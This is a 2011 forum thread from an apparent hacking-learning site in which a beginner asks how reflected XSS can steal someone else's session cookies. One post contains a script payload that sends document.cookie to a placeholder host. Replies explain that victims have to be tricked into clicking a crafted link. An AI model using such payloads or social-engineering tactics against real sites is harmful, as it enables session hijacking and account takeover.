[beginner] Non-Persistent XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

[beginner] Non-Persistent XSS

Post by ibdwnm on Thu Apr 28, 2011 10:26 am
([msg=56735]see [beginner] Non-Persistent XSS[/msg])

Hi,
I don't understand how to exploit non-persistent XSS; everywhere I read this cookie-logger thing, for example on this page:
http://hbay.netii.net/Webs.pdf
"In the next section we’ll talk about creating a cookie logger so we can steal session cookies and successfully get some user and/or admin privileges!"
But how is the user supposed to get his cookies logged? It isn't permanent, I can only get mine logged :P
It don't get how it can be possible in non-persistent XSS...
Thank you :D
ibdwnm
New User
New User
 
Posts: 5
Joined: Wed Apr 06, 2011 1:22 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by tucak on Thu Apr 28, 2011 11:14 am
([msg=56737]see Re: [beginner] Non-Persistent XSS[/msg])

You need to trick him to visit your link.
tucak
New User
New User
 
Posts: 47
Joined: Wed Jun 04, 2008 12:20 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by ibdwnm on Thu Apr 28, 2011 11:26 am
([msg=56738]see Re: [beginner] Non-Persistent XSS[/msg])

But how am I supposed to trick someone using non-persisten XSS? I could tell him "go to that page, it's cool", but it has got nothing to do with XSS? GMX's registration page is vulnerable; but copying something like "<script>document.location="http://mypage.com/documents.php?c="+document.cookie;</script>"
is bull; it gets executed, but no is affected by it. What has the page being vulnerable to do with tricking someone?
I think I've got something funademental wrong...
ibdwnm
New User
New User
 
Posts: 5
Joined: Wed Apr 06, 2011 1:22 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by jgreen45 on Thu Apr 28, 2011 2:09 pm
([msg=56740]see Re: [beginner] Non-Persistent XSS[/msg])

I think that example might help, I remember someone came here to HTS and asked for people to pen test his site. When Goatboy inevitably 1337 h4x0red his website he found a non-persistent XXS exploit, and tricked (but for a good reason) the OP into clicking his link through social engineering, Goatboy got an admin cookie and alerted the OP, who then fixed the problem.

The post
Last edited by jgreen45 on Fri Apr 29, 2011 6:51 am, edited 1 time in total.
I can't come to bed...
Someone is WRONG on the internet


http://xkcd.com/386/
User avatar
jgreen45
Poster
Poster
 
Posts: 106
Joined: Wed Feb 25, 2009 6:18 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by ibdwnm on Thu Apr 28, 2011 4:59 pm
([msg=56741]see Re: [beginner] Non-Persistent XSS[/msg])

I get it, thanks :D
ibdwnm
New User
New User
 
Posts: 5
Joined: Wed Apr 06, 2011 1:22 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Thu May 05, 2011 12:20 pm
([msg=57021]see Re: [beginner] Non-Persistent XSS[/msg])

jgreen, I remember that. Goatboy, using his 1337 skillz, posted the pic's of 'himself' in the admin edit area and OP was like " O_O ". Being nice and all Goatboy told him how to fix and how he got into the admin area. Shit got cash in that thread.
I study Gotafu.
Reason7194
Poster
Poster
 
Posts: 215
Joined: Fri Jan 07, 2011 5:01 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Goatboy on Thu May 05, 2011 2:06 pm
([msg=57025]see Re: [beginner] Non-Persistent XSS[/msg])

Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2788
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Thu May 05, 2011 4:12 pm
([msg=57035]see Re: [beginner] Non-Persistent XSS[/msg])

Did you mean to write "herp" and "derp" in that link?
I study Gotafu.
Reason7194
Poster
Poster
 
Posts: 215
Joined: Fri Jan 07, 2011 5:01 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Goatboy on Thu May 05, 2011 4:24 pm
([msg=57036]see Re: [beginner] Non-Persistent XSS[/msg])

Very much so. Needed to make it look like I was just putting test values. I use herp and derp in place of foo and bar.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2788
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Dwere134 on Tue May 10, 2011 11:03 am
([msg=57238]see Re: [beginner] Non-Persistent XSS[/msg])

Goatboy wrote:Very much so. Needed to make it look like I was just putting test values. I use herp and derp in place of foo and bar.

Why not fu and bar?
At any rate, does that cookie stealer steal only his cookies, or anyone who clicks on them?
Dwere (David)
Goatboy wrote:
Dwere wrote:I'm not one to start some branch of religion though. Not my thing.

Of course if you wanted to, you could call it the Davidians!
Dwere134
Experienced User
Experienced User
 
Posts: 83
Joined: Mon Sep 27, 2010 5:06 pm
Blog: View Blog (0)


Next

Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests